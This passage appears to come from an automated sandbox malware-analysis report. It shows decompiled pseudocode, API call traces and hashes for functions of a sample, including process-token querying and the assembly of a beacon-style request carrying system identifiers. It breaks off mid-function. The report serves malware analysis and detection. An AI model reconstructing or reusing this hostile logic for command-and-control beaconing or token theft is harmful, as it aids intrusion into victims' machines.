                                0x02bd5b3d
                                0x02bd5b45
                                0x02bd5b48
                                0x02bd5b60
                                0x02bd5b60
                                0x02bd5b6b
                                0x02bd5b6b
                                0x02bd5b7c

                                APIs
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0500935C), ref: 02BD5B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0500935C), ref: 02BD5B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 696d2fbce211b059f5204f3edf80118f924608d5154105c748c2f946b69ede7b
                                • Instruction ID: 0c0e7eb271c43defa45fe081982cdf276f0a43fb57857a1120ca104643cd9b34
                                • Opcode Fuzzy Hash: 696d2fbce211b059f5204f3edf80118f924608d5154105c748c2f946b69ede7b
                                • Instruction Fuzzy Hash: 6E017C32600209BBDB226FA4DC44FDABB69EF84794F50446AFA409A160EB71D965CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8CFA, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E02BD8CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02BD1525(_t2);
				if(_t34 != 0) {
					_t30 = E02BD1525(_t28);
					if(_t30 == 0) {
						E02BD8B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02BDA7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02BDA7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x02bd8cfa
                                0x02bd8d04
                                0x02bd8d06
                                0x02bd8d0c
                                0x02bd8d0c
                                0x02bd8d15
                                0x02bd8d19
                                0x02bd8d25
                                0x02bd8d29
                                0x02bd8d9d
                                0x02bd8d2b
                                0x02bd8d2b
                                0x02bd8d2f
                                0x02bd8d34
                                0x02bd8d39
                                0x02bd8d53
                                0x02bd8d42
                                0x02bd8d42
                                0x02bd8d46
                                0x02bd8d49
                                0x02bd8d4e
                                0x02bd8d4e
                                0x02bd8d58
                                0x02bd8d80
                                0x02bd8d86
                                0x02bd8d89
                                0x02bd8d5a
                                0x02bd8d5c
                                0x02bd8d64
                                0x02bd8d6f
                                0x02bd8d74
                                0x02bd8d74
                                0x02bd8d90
                                0x02bd8d97
                                0x02bd8d98
                                0x02bd8d98
                                0x02bd8d29
                                0x02bd8da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000), ref: 02BD8D06
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                  • Part of subcall function 02BDA7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BD8D34,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102), ref: 02BDA7D0
                                  • Part of subcall function 02BDA7C2: StrChrA.SHLWAPI(?,0000003F,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BDA7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?), ref: 02BD8D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D80
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 6edae6deeacb693bc99ae0617ca66cce8290e694aa5bb9e8b955f41ab442e3ea
                                • Instruction ID: 72141147746b5afab4bd8765def92683c6043aaf8638056428ec899ad1cd6492
                                • Opcode Fuzzy Hash: 6edae6deeacb693bc99ae0617ca66cce8290e694aa5bb9e8b955f41ab442e3ea
                                • Instruction Fuzzy Hash: 1821E172500215BFCB026F78CC54AEA7FB9EF16384B1484D9F8059B251FB30C902CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD272D, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02BD1525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x02bd2742
                                0x02bd2746
                                0x02bd2750
                                0x02bd2755
                                0x02bd275a
                                0x02bd275c
                                0x02bd2764
                                0x02bd2769
                                0x02bd2777
                                0x02bd277c
                                0x02bd2786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0500935C,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD273D
                                • lstrlenW.KERNEL32(02BD5398,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD2744
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD2764
                                • memcpy.NTDLL(74E069A0,02BD5398,00000002,00000000,004F0053,74E069A0,?,?,02BD5398,004F0053,0500935C), ref: 02BD2777
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 08f65026b31cf1649312b2434417c5bd12554228f58f0c8155982f0cd8684a5c
                                • Instruction ID: 02f9041352f3a9f37ee1e8389762221165bcde40bfcb0d23f5c0502b911549f1
                                • Opcode Fuzzy Hash: 08f65026b31cf1649312b2434417c5bd12554228f58f0c8155982f0cd8684a5c
                                • Instruction Fuzzy Hash: 70F03C32900119BB8F119FA9CC44CDE7BADEF082947454062AD04D7105FA75EA108BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BDA677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                • lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 05168e9084cdf5735e0afe842a3087ddc2e41c8a39dee14e60406f2cbceaca58
                                • Instruction ID: 2508e773bea6d0d1a598f1968e8ff07b76df564c613de7c6c7665f4f7f0d8197
                                • Opcode Fuzzy Hash: 05168e9084cdf5735e0afe842a3087ddc2e41c8a39dee14e60406f2cbceaca58
                                • Instruction Fuzzy Hash: D5E09233902621A787119BE8AC48CDBBFADEF896953040817F600D3100E724C815CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 5032 Parent PID: 1364 rundll32.exeCOMMON

                                Executed Functions

                                Function 04A49A0F, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E04A49A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04A41525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04A48B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x04a49a1c
                                0x04a49a1d
                                0x04a49a1e
                                0x04a49a1f
                                0x04a49a20
                                0x04a49a24
                                0x04a49a2b
                                0x04a49a3a
                                0x04a49a3d
                                0x04a49a40
                                0x04a49a47
                                0x04a49a4a
                                0x04a49a4d
                                0x04a49a50
                                0x04a49a53
                                0x04a49a5e
                                0x04a49a60
                                0x04a49a69
                                0x04a49a71
                                0x04a49a73
                                0x04a49a85
                                0x04a49a8f
                                0x04a49a93
                                0x04a49aa2
                                0x04a49aa6
                                0x04a49aaf
                                0x04a49ab7
                                0x04a49ab7
                                0x04a49ab9
                                0x04a49ab9
                                0x04a49ac1
                                0x04a49ac7
                                0x04a49acb
                                0x04a49acb
                                0x04a49ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04A49A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04A49A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A49A85
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A49AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04A49AAF
                                • NtClose.NTDLL(?), ref: 04A49AC1
                                • NtClose.NTDLL(00000000), ref: 04A49ACB
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 90352ec196c2820b60046e9aeefeffcdbcea37852e897613f8370a379c7f145e
                                • Instruction ID: 27a6e79b1577fc2300c53e070743b158194d369fbc27f768e71680d913f25803
                                • Opcode Fuzzy Hash: 90352ec196c2820b60046e9aeefeffcdbcea37852e897613f8370a379c7f145e
                                • Instruction Fuzzy Hash: 222136B2900218BBEB019FA4DC44EDEBFBDEF88750F108022FA05E6150D7729A519BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A49BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E04A49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4a4d018; // 0xefcf766a
				asm("bswap eax");
				_t27 =  *0x4a4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4a4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E04A4D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x4a4d2a8; // 0x40a5a8
				_t3 = _t30 + 0x4a4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x4a4d02c,  *0x4a4d004, _t25);
				_t33 = E04A43288();
				_t34 =  *0x4a4d2a8; // 0x40a5a8
				_t4 = _t34 + 0x4a4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E04A4831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x4a4d2a8; // 0x40a5a8
					_t6 = _t83 + 0x4a4e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4a4d238, 0, _t96);
				}
				_t97 = E04A49267();
				if(_t97 != 0) {
					_t78 =  *0x4a4d2a8; // 0x40a5a8
					_t8 = _t78 + 0x4a4e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4a4d238, 0, _t97);
				}
				_t98 =  *0x4a4d32c; // 0x4e595b0
				_a32 = E04A4284E(0x4a4d00a, _t98 + 4);
				_t42 =  *0x4a4d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4a4d2a8; // 0x40a5a8
					_t11 = _t74 + 0x4a4e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4a4d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4a4d2a8; // 0x40a5a8
					_t13 = _t71 + 0x4a4e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x4a4d238, 0, 0x800);
					if(_t100 != 0) {
						E04A43239(GetTickCount());
						_t50 =  *0x4a4d32c; // 0x4e595b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4a4d32c; // 0x4e595b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4a4d32c; // 0x4e595b0
						_t103 = E04A47B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4a4c28c);
							_push(_t103);
							_t62 = E04A4A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04A4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04A45433();
								}
								HeapFree( *0x4a4d238, 0, _v44);
							}
							RtlFreeHeap( *0x4a4d238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x4a4d238, 0, _t100); // executed
					}
					HeapFree( *0x4a4d238, 0, _a24);
				}
				RtlFreeHeap( *0x4a4d238, 0, _t105); // executed
				return _a4;
			}

















































                                0x04a49bf1
                                0x04a49bf1
                                0x04a49bf1
                                0x04a49bf6
                                0x04a49bfc
                                0x04a49c06
                                0x04a49c08
                                0x04a49c08
                                0x04a49c15
                                0x04a49c20
                                0x04a49c23
                                0x04a49c2e
                                0x04a49c31
                                0x04a49c36
                                0x04a49c39
                                0x04a49c3e
                                0x04a49c41
                                0x04a49c4d
                                0x04a49c5a
                                0x04a49c5c
                                0x04a49c62
                                0x04a49c67
                                0x04a49c72
                                0x04a49c74
                                0x04a49c77
                                0x04a49c79
                                0x04a49c7e
                                0x04a49c82
                                0x04a49c84
                                0x04a49c89
                                0x04a49c95
                                0x04a49c97
                                0x04a49ca3
                                0x04a49ca5
                                0x04a49ca5
                                0x04a49cb0
                                0x04a49cb4
                                0x04a49cb6
                                0x04a49cbb
                                0x04a49cc7
                                0x04a49cc9
                                0x04a49cd5
                                0x04a49cd7
                                0x04a49cd7
                                0x04a49cdd
                                0x04a49cf0
                                0x04a49cf4
                                0x04a49cfb
                                0x04a49cfe
                                0x04a49d03
                                0x04a49d0e
                                0x04a49d10
                                0x04a49d13
                                0x04a49d13
                                0x04a49d15
                                0x04a49d1c
                                0x04a49d1f
                                0x04a49d24
                                0x04a49d2e
                                0x04a49d30
                                0x04a49d38
                                0x04a49d51
                                0x04a49d55
                                0x04a49d61
                                0x04a49d66
                                0x04a49d6f
                                0x04a49d80
                                0x04a49d84
                                0x04a49d8d
                                0x04a49d93
                                0x04a49da0
                                0x04a49dad
                                0x04a49db3
                                0x04a49dbf
                                0x04a49dc5
                                0x04a49dc6
                                0x04a49dcb
                                0x04a49dd1
                                0x04a49dd7
                                0x04a49dde
                                0x04a49de5
                                0x04a49deb
                                0x04a49df2
                                0x04a49df6
                                0x04a49e01
                                0x04a49e06
                                0x04a49e0c
                                0x04a49e15
                                0x04a49e15
                                0x04a49e26
                                0x04a49e26
                                0x04a49e35
                                0x04a49e35
                                0x04a49e44
                                0x04a49e44
                                0x04a49e56
                                0x04a49e56
                                0x04a49e65
                                0x04a49e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A49C08
                                • wsprintfA.USER32 ref: 04A49C55
                                • wsprintfA.USER32 ref: 04A49C72
                                • wsprintfA.USER32 ref: 04A49C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49CA5
                                • wsprintfA.USER32 ref: 04A49CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49CD7
                                • wsprintfA.USER32 ref: 04A49D0E
                                • wsprintfA.USER32 ref: 04A49D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A49D4B
                                • GetTickCount.KERNEL32 ref: 04A49D5B
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A49D6F
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A49D8D
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A47B8D: strcpy.NTDLL ref: 04A47BD7
                                  • Part of subcall function 04A47B8D: lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                • StrTrimA.SHLWAPI(00000000,04A4C28C,?,04E595B0), ref: 04A49DBF
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A4A677: lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                  • Part of subcall function 04A4A677: lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04A49DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A49DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 04A49DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04A49DF6
                                  • Part of subcall function 04A4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04A493EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04A49E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04A49E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04E595B0), ref: 04A49E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 04A49E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 734f15592640f87782ee869cddbf76a21986ba8c1243f3c8bfbb39de52768753
                                • Instruction ID: 72976ce556b8ae27c6d0dde9ad90a84cfd8c70a376e6ec447201d34111c3c128
                                • Opcode Fuzzy Hash: 734f15592640f87782ee869cddbf76a21986ba8c1243f3c8bfbb39de52768753
                                • Instruction Fuzzy Hash: DB617B79500200AFE721AB74EC48E5F7BECEBD8754F050114F909DB260DB3AED169B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A47C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150timememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E04A47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4a4d240);
					_v20 = 0;
					_v16 = 0;
					L04A4AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4a4d26c; // 0x2cc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4a4d24c = 5;
						} else {
							_t68 = E04A45319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4a4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04A42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04A49870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4a4d244);
							goto L21;
						} else {
							__eflags =  *0x4a4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04A45433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4a4d248);
								L21:
								L04A4AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
